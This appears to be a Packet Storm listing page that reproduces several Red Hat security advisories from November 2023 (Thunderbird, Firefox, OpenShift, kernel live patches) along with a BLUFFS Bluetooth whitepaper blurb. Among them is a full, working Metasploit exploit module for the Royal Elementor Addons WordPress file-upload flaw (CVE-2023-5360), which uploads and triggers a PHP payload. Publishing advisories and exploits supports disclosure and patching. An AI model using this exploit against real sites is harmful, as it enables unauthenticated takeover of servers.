Red Hat Security Advisory 2023-7574-01 - An update for thunderbird is now available for Red Hat Enterprise Linux 8.2 Advanced Update Support, Red Hat Enterprise Linux 8.2 Telecommunications Update Service, and Red Hat Enterprise Linux 8.2 Update Services for SAP Solutions. Issues addressed include a use-after-free vulnerability.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2023/rhsa-2023_7574.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: thunderbird security update  
Advisory ID:        RHSA-2023:7574-01  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2023:7574  
Issue date:         2023-11-29  
Revision:           01  
CVE Names:          CVE-2023-6204  
====================================================================

Summary: 

An update for thunderbird is now available for Red Hat Enterprise Linux 8.2 Advanced Update Support, Red Hat Enterprise Linux 8.2 Telecommunications Update Service, and Red Hat Enterprise Linux 8.2 Update Services for SAP Solutions.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

Mozilla Thunderbird is a standalone mail and newsgroup client.

This update upgrades Thunderbird to version 115.5.0.

Security Fix(es):

* Mozilla: Out-of-bound memory access in WebGL2 blitFramebuffer (CVE-2023-6204)

* Mozilla: Use-after-free in MessagePort::Entangled (CVE-2023-6205)

* Mozilla: Clickjacking permission prompts using the fullscreen transition (CVE-2023-6206)

* Mozilla: Use-after-free in ReadableByteStreamQueueEntry::Buffer (CVE-2023-6207)

* Mozilla: Memory safety bugs fixed in Firefox 120, Firefox ESR 115.5, and Thunderbird 115.5 (CVE-2023-6212)

* Mozilla: Using Selection API would copy contents into X11 primary selection. (CVE-2023-6208)

* Mozilla: Incorrect parsing of relative URLs starting with \"///\" (CVE-2023-6209)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2023-6204

References:

https://access.redhat.com/security/updates/classification/#important  
https://bugzilla.redhat.com/show_bug.cgi?id=2250896  
https://bugzilla.redhat.com/show_bug.cgi?id=2250897  
https://bugzilla.redhat.com/show_bug.cgi?id=2250898  
https://bugzilla.redhat.com/show_bug.cgi?id=2250899  
https://bugzilla.redhat.com/show_bug.cgi?id=2250900  
https://bugzilla.redhat.com/show_bug.cgi?id=2250901  
https://bugzilla.redhat.com/show_bug.cgi?id=2250902

Red Hat Security Advisory 2023-7574-01

Red Hat Security Advisory 2023-7573-01 - An update for firefox is now available for Red Hat Enterprise Linux 8.2 Advanced Update Support, Red Hat Enterprise Linux 8.2 Telecommunications Update Service, and Red Hat Enterprise Linux 8.2 Update Services for SAP Solutions. Issues addressed include a use-after-free vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2023/rhsa-2023_7573.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: firefox security updateAdvisory ID:        RHSA-2023:7573-01Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2023:7573Issue date:         2023-11-29Revision:           01CVE Names:          CVE-2023-6204====================================================================Summary: An update for firefox is now available for Red Hat Enterprise Linux 8.2 Advanced Update Support, Red Hat Enterprise Linux 8.2 Telecommunications Update Service, and Red Hat Enterprise Linux 8.2 Update Services for SAP Solutions.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Mozilla Firefox is an open-source web browser, designed for standards compliance, performance, and portability.This update upgrades Firefox to version 115.5.0 ESR.Security Fix(es):* Mozilla: Out-of-bound memory access in WebGL2 blitFramebuffer (CVE-2023-6204)* Mozilla: Use-after-free in MessagePort::Entangled (CVE-2023-6205)* Mozilla: Clickjacking permission prompts using the fullscreen transition (CVE-2023-6206)* Mozilla: Use-after-free in ReadableByteStreamQueueEntry::Buffer (CVE-2023-6207)* Mozilla: Memory safety bugs fixed in Firefox 120, Firefox ESR 115.5, and Thunderbird 115.5 (CVE-2023-6212)* Mozilla: Using Selection API would copy contents into X11 primary selection. (CVE-2023-6208)* Mozilla: Incorrect parsing of relative URLs starting with \"///\" (CVE-2023-6209)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-6204References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2250896https://bugzilla.redhat.com/show_bug.cgi?id=2250897https://bugzilla.redhat.com/show_bug.cgi?id=2250898https://bugzilla.redhat.com/show_bug.cgi?id=2250899https://bugzilla.redhat.com/show_bug.cgi?id=2250900https://bugzilla.redhat.com/show_bug.cgi?id=2250901https://bugzilla.redhat.com/show_bug.cgi?id=2250902

Red Hat Security Advisory 2023-7573-01

Red Hat Security Advisory 2023-7570-01 - An update for thunderbird is now available for Red Hat Enterprise Linux 8.4 Advanced Mission Critical Update Support, Red Hat Enterprise Linux 8.4 Telecommunications Update Service, and Red Hat Enterprise Linux 8.4 Update Services for SAP Solutions. Issues addressed include a use-after-free vulnerability.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2023/rhsa-2023_7570.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: thunderbird security update  
Advisory ID:        RHSA-2023:7570-01  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2023:7570  
Issue date:         2023-11-29  
Revision:           01  
CVE Names:          CVE-2023-6204  
====================================================================

Summary: 

An update for thunderbird is now available for Red Hat Enterprise Linux 8.4 Advanced Mission Critical Update Support, Red Hat Enterprise Linux 8.4 Telecommunications Update Service, and Red Hat Enterprise Linux 8.4 Update Services for SAP Solutions.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

Mozilla Thunderbird is a standalone mail and newsgroup client.

This update upgrades Thunderbird to version 115.5.0.

Security Fix(es):

* Mozilla: Out-of-bound memory access in WebGL2 blitFramebuffer (CVE-2023-6204)

* Mozilla: Use-after-free in MessagePort::Entangled (CVE-2023-6205)

* Mozilla: Clickjacking permission prompts using the fullscreen transition (CVE-2023-6206)

* Mozilla: Use-after-free in ReadableByteStreamQueueEntry::Buffer (CVE-2023-6207)

* Mozilla: Memory safety bugs fixed in Firefox 120, Firefox ESR 115.5, and Thunderbird 115.5 (CVE-2023-6212)

* Mozilla: Using Selection API would copy contents into X11 primary selection. (CVE-2023-6208)

* Mozilla: Incorrect parsing of relative URLs starting with \"///\" (CVE-2023-6209)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2023-6204

References:

https://access.redhat.com/security/updates/classification/#important  
https://bugzilla.redhat.com/show_bug.cgi?id=2250896  
https://bugzilla.redhat.com/show_bug.cgi?id=2250897  
https://bugzilla.redhat.com/show_bug.cgi?id=2250898  
https://bugzilla.redhat.com/show_bug.cgi?id=2250899  
https://bugzilla.redhat.com/show_bug.cgi?id=2250900  
https://bugzilla.redhat.com/show_bug.cgi?id=2250901  
https://bugzilla.redhat.com/show_bug.cgi?id=2250902

Red Hat Security Advisory 2023-7570-01

Red Hat Security Advisory 2023-7569-01 - An update for firefox is now available for Red Hat Enterprise Linux 8.4 Advanced Mission Critical Update Support, Red Hat Enterprise Linux 8.4 Telecommunications Update Service, and Red Hat Enterprise Linux 8.4 Update Services for SAP Solutions. Issues addressed include a use-after-free vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2023/rhsa-2023_7569.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: firefox security updateAdvisory ID:        RHSA-2023:7569-01Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2023:7569Issue date:         2023-11-29Revision:           01CVE Names:          CVE-2023-6204====================================================================Summary: An update for firefox is now available for Red Hat Enterprise Linux 8.4 Advanced Mission Critical Update Support, Red Hat Enterprise Linux 8.4 Telecommunications Update Service, and Red Hat Enterprise Linux 8.4 Update Services for SAP Solutions.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Mozilla Firefox is an open-source web browser, designed for standards compliance, performance, and portability.This update upgrades Firefox to version 115.5.0 ESR.Security Fix(es):* Mozilla: Out-of-bound memory access in WebGL2 blitFramebuffer (CVE-2023-6204)* Mozilla: Use-after-free in MessagePort::Entangled (CVE-2023-6205)* Mozilla: Clickjacking permission prompts using the fullscreen transition (CVE-2023-6206)* Mozilla: Use-after-free in ReadableByteStreamQueueEntry::Buffer (CVE-2023-6207)* Mozilla: Memory safety bugs fixed in Firefox 120, Firefox ESR 115.5, and Thunderbird 115.5 (CVE-2023-6212)* Mozilla: Using Selection API would copy contents into X11 primary selection. (CVE-2023-6208)* Mozilla: Incorrect parsing of relative URLs starting with \"///\" (CVE-2023-6209)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-6204References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2250896https://bugzilla.redhat.com/show_bug.cgi?id=2250897https://bugzilla.redhat.com/show_bug.cgi?id=2250898https://bugzilla.redhat.com/show_bug.cgi?id=2250899https://bugzilla.redhat.com/show_bug.cgi?id=2250900https://bugzilla.redhat.com/show_bug.cgi?id=2250901https://bugzilla.redhat.com/show_bug.cgi?id=2250902

Red Hat Security Advisory 2023-7569-01

Red Hat Security Advisory 2023-7473-01 - Red Hat OpenShift Container Platform release 4.14.4 is now available with updates to packages and images that fix several bugs and add enhancements. Issues addressed include a denial of service vulnerability.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2023/rhsa-2023_7473.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: OpenShift Container Platform 4.14.4 packages and security update  
Advisory ID:        RHSA-2023:7473-01  
Product:            Red Hat OpenShift Enterprise  
Advisory URL:       https://access.redhat.com/errata/RHSA-2023:7473  
Issue date:         2023-11-29  
Revision:           01  
CVE Names:          CVE-2023-25577  
====================================================================

Summary: 

Red Hat OpenShift Container Platform release 4.14.4 is now available with updates to packages and images that fix several bugs and add enhancements.

This release includes a security update for Red Hat OpenShift Container Platform 4.14.

Red Hat Product Security has rated this update as having a security impact of [impact]. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments.

This advisory contains the RPM packages for Red Hat OpenShift Container Platform 4.14.4. See the following advisory for the container images for this release:

https://access.redhat.com/errata/RHSA-2023:7470

Security Fix(es):

* python-werkzeug: high resource usage when parsing multipart form data  
with many fields (CVE-2023-25577)  
* haproxy: Proxy forwards malformed empty Content-Length headers  
(CVE-2023-40225)  
* python-werkzeug: high resource consumption leading to denial of service  
(CVE-2023-46136)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

All OpenShift Container Platform 4.14 users are advised to upgrade to these updated packages and images when they are available in the appropriate release channel. To check for available updates, use the OpenShift CLI (oc) or web console. Instructions for upgrading a cluster are available at https://docs.openshift.com/container-platform/4.14/updating/updating_a_cluster/updating-cluster-cli.html

Solution:

https://docs.openshift.com/container-platform/4.14/release_notes/ocp-4-14-release-notes.html

CVEs:

CVE-2023-25577

References:

https://access.redhat.com/security/updates/classification/#important  
https://bugzilla.redhat.com/show_bug.cgi?id=2170242  
https://bugzilla.redhat.com/show_bug.cgi?id=2231370  
https://bugzilla.redhat.com/show_bug.cgi?id=2246310

Red Hat Security Advisory 2023-7473-01

Red Hat Security Advisory 2023-7470-01 - Red Hat OpenShift Container Platform release 4.14.4 is now available with updates to packages and images that fix several bugs and add enhancements. Issues addressed include a denial of service vulnerability.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2023/rhsa-2023_7470.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: OpenShift Container Platform 4.14.4 bug fix and security update  
Advisory ID:        RHSA-2023:7470-01  
Product:            Red Hat OpenShift Enterprise  
Advisory URL:       https://access.redhat.com/errata/RHSA-2023:7470  
Issue date:         2023-11-29  
Revision:           01  
CVE Names:          CVE-2023-39325  
====================================================================

Summary: 

Red Hat OpenShift Container Platform release 4.14.4 is now available with updates to packages and images that fix several bugs and add enhancements.

This release includes a security update for Red Hat OpenShift Container Platform 4.14.

Red Hat Product Security has rated this update as having a security impact of [impact]. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments.

This advisory contains the container images for Red Hat OpenShift Container Platform 4.14.4. See the following advisory for the RPM packages for this release:

https://access.redhat.com/errata/RHSA-2023:7473

Space precludes documenting all of the container images in this advisory. See the following Release Notes documentation, which will be updated shortly for this release, for details about these changes:

https://docs.openshift.com/container-platform/4.14/release_notes/ocp-4-14-release-notes.html

Security Fix(es):

* golang: net/http, x/net/http2: rapid stream resets can cause excessive  
work (CVE-2023-44487) (CVE-2023-39325)  
* opentelemetry: DoS vulnerability in otelhttp (CVE-2023-45142)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

All OpenShift Container Platform 4.14 users are advised to upgrade to these updated packages and images when they are available in the appropriate release channel. To check for available updates, use the OpenShift CLI (oc) or web console. Instructions for upgrading a cluster are available at https://docs.openshift.com/container-platform/4.14/updating/updating_a_cluster/updating-cluster-cli.html

Solution:

CVEs:

CVE-2023-39325

References:

https://access.redhat.com/security/updates/classification/#important  
https://bugzilla.redhat.com/show_bug.cgi?id=2243296  
https://bugzilla.redhat.com/show_bug.cgi?id=2245180  
https://issues.redhat.com/browse/OCPBUGS-19678  
https://issues.redhat.com/browse/OCPBUGS-21761  
https://issues.redhat.com/browse/OCPBUGS-21868  
https://issues.redhat.com/browse/OCPBUGS-22688  
https://issues.redhat.com/browse/OCPBUGS-22774  
https://issues.redhat.com/browse/OCPBUGS-22996  
https://issues.redhat.com/browse/OCPBUGS-23150  
https://issues.redhat.com/browse/OCPBUGS-23210  
https://issues.redhat.com/browse/OCPBUGS-23212  
https://issues.redhat.com/browse/OCPBUGS-23315  
https://issues.redhat.com/browse/OCPBUGS-23392  
https://issues.redhat.com/browse/OCPBUGS-23393  
https://issues.redhat.com/browse/OCPBUGS-23408  
https://issues.redhat.com/browse/OCPBUGS-23423  
https://issues.redhat.com/browse/OCPBUGS-23450  
https://issues.redhat.com/browse/OCPBUGS-23505  
https://issues.redhat.com/browse/OCPBUGS-23508  
https://issues.redhat.com/browse/OCPBUGS-283

Red Hat Security Advisory 2023-7470-01

Whitepaper titled BLUFFS: Bluetooth Forward and Future Secrecy Attacks and Defenses. It presents six novel attacks affecting chips from many major Bluetooth vendors.

BLUFFS: Bluetooth Forward And Future Secrecy Attacks And Defenses

WordPress Royal Elementor Addons and Templates plugin versions prior to 1.3.79 suffer from a remote shell upload vulnerability.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::Remote::HTTP::Wordpress  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'WordPress Royal Elementor Addons RCE',        'Description' => %q{          Exploit for the unauthenticated file upload vulnerability in WordPress Royal Elementor Addons and Templates plugin (< 1.3.79).        },        'Author' => [          'Fioravante Souza', # Vulnerability discovery          'Valentin Lobstein' # Metasploit module        ],        'License' => MSF_LICENSE,        'References' => [          ['CVE', '2023-5360'],          ['URL', 'https://vulners.com/nuclei/NUCLEI:CVE-2023-5360'],          ['WPVDB', '281518ff-7816-4007-b712-63aed7828b34']        ],        'Platform' => ['unix', 'linux', 'win', 'php'],        'Arch' => [ARCH_PHP, ARCH_CMD],        'Targets' => [['Automatic', {}]],        'DisclosureDate' => '2023-11-23',        'DefaultTarget' => 0,        'DefaultOptions' => {          'SSL' => true,          'RPORT' => 443        },        'Privileged' => false,        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [IOC_IN_LOGS]        }      )  )  end  def check    return CheckCode::Unknown unless wordpress_and_online?    wp_version = wordpress_version    print_status("WordPress Version: #{wp_version}") if wp_version    check_code = check_plugin_version_from_readme('royal-elementor-addons', '1.3.79')    if check_code.code != 'appears'      return CheckCode::Safe    end    plugin_version = check_code.details[:version]    print_good("Detected Royal Elementor Addons version: #{plugin_version}")    return CheckCode::Appears  end  def exploit    print_status('Attempting to retrieve nonce...')    nonce = retrieve_nonce    print_status('Sending payload')    uri = normalize_uri(target_uri.path, 'wp-admin', 'admin-ajax.php')    data = {      'action' => 'wpr_addons_upload_file',      'max_file_size' => rand(10001),      'allowed_file_types' => 'ph$p',      'triggering_event' => 'click',      'wpr_addons_nonce' => nonce    }    file_content = '<?php '    file_content << (payload_instance.arch.include?(ARCH_PHP) ? payload.encoded : "system(base64_decode('#{Rex::Text.encode_base64(payload.encoded)}'));")    file_content << '?>'    file_name = "#{Rex::Text.rand_text_alphanumeric(8)}.ph$p"    post_data = Rex::MIME::Message.new    post_data.add_part(file_content, 'application/octet-stream', nil, "form-data; name=\"uploaded_file\"; filename=\"#{file_name}\"")    data.each_pair do |key, value|      post_data.add_part(value.to_s, nil, nil, "form-data; name=\"#{key}\"")    end    res = send_request_cgi({      'uri' => uri,      'method' => 'POST',      'ctype' => "multipart/form-data; boundary=#{post_data.bound}",      'data' => post_data.to_s    })    unless res      fail_with(Failure::Unreachable, 'No response received from the target')    end    if res.code == 200 && res.body.include?('success')      print_good('Payload uploaded successfully')      response_data = JSON.parse(res.body)      if response_data.key?('data') && response_data['data'].key?('url')        file_url = response_data['data']['url']        print_status('Triggering the payload')        send_request_cgi({          'uri' => file_url,          'method' => 'GET'        })      else        fail_with(Failure::UnexpectedReply, 'Payload uploaded but no URL returned in the response')      end    else      fail_with(Failure::UnexpectedReply, 'Failed to upload the payload')    end  end  def retrieve_nonce    res = send_request_cgi('uri' => normalize_uri(target_uri.path), 'method' => 'GET')    fail_with(Failure::Unreachable, 'No response received from the target') if res.nil?    fail_with(Failure::UnexpectedReply, "Unexpected HTTP response code from the target: #{res.code}") if res.code != 200    match = res.body.match(/var\s+WprConfig\s*=\s*({.+?});/)    fail_with(Failure::NoTarget, 'Nonce not found in the response. Is Royal Elementor Addons activated AND being used by the WordPress site being targeted?') if match.nil? || match[1].nil?    nonce = JSON.parse(match[1])['nonce']    fail_with(Failure::NoTarget, 'Parsed a response, but the nonce value is missing') if nonce.nil?    print_good("Nonce found in response: #{nonce.inspect}")    nonce  endend

WordPress Royal Elementor Addons And Templates Remote Shell Upload

Red Hat Security Advisory 2023-7559-01 - An update for kpatch-patch is now available for Red Hat Enterprise Linux 8.4 Update Services for SAP Solutions. Issues addressed include a use-after-free vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2023/rhsa-2023_7559.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: kpatch-patch security updateAdvisory ID:        RHSA-2023:7559-01Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2023:7559Issue date:         2023-11-28Revision:           01CVE Names:          CVE-2023-5178====================================================================Summary: An update for kpatch-patch is now available for Red Hat Enterprise Linux 8.4 Update Services for SAP Solutions.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:This is a kernel live patch module which is automatically loaded by the RPM post-install script to modify the code of a running kernel.Security Fix(es):* kernel: use after free in nvmet_tcp_free_crypto in NVMe (CVE-2023-5178)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-5178References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2241924

Red Hat Security Advisory 2023-7559-01

Red Hat Security Advisory 2023-7558-01 - An update for kpatch-patch is now available for Red Hat Enterprise Linux 8.8 Extended Update Support. Issues addressed include a use-after-free vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2023/rhsa-2023_7558.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: kpatch-patch security updateAdvisory ID:        RHSA-2023:7558-01Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2023:7558Issue date:         2023-11-28Revision:           01CVE Names:          CVE-2023-3609====================================================================Summary: An update for kpatch-patch is now available for Red Hat Enterprise Linux 8.8 Extended Update Support.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:This is a kernel live patch module which is automatically loaded by the RPM post-install script to modify the code of a running kernel.Security Fix(es):* kernel: net/sched: cls_u32 component reference counter leak if tcf_change_indev() fails (CVE-2023-3609)* kernel: net/sched: Use-after-free vulnerabilities in the net/sched classifiers: cls_fw, cls_u32 and cls_route (CVE-2023-4128, CVE-2023-4206, CVE-2023-4207, CVE-2023-4208)* kernel: netfilter: potential slab-out-of-bound access due to integer underflow (CVE-2023-42753)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-3609References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2225201https://bugzilla.redhat.com/show_bug.cgi?id=2225511https://bugzilla.redhat.com/show_bug.cgi?id=2239843

Source

Packet Storm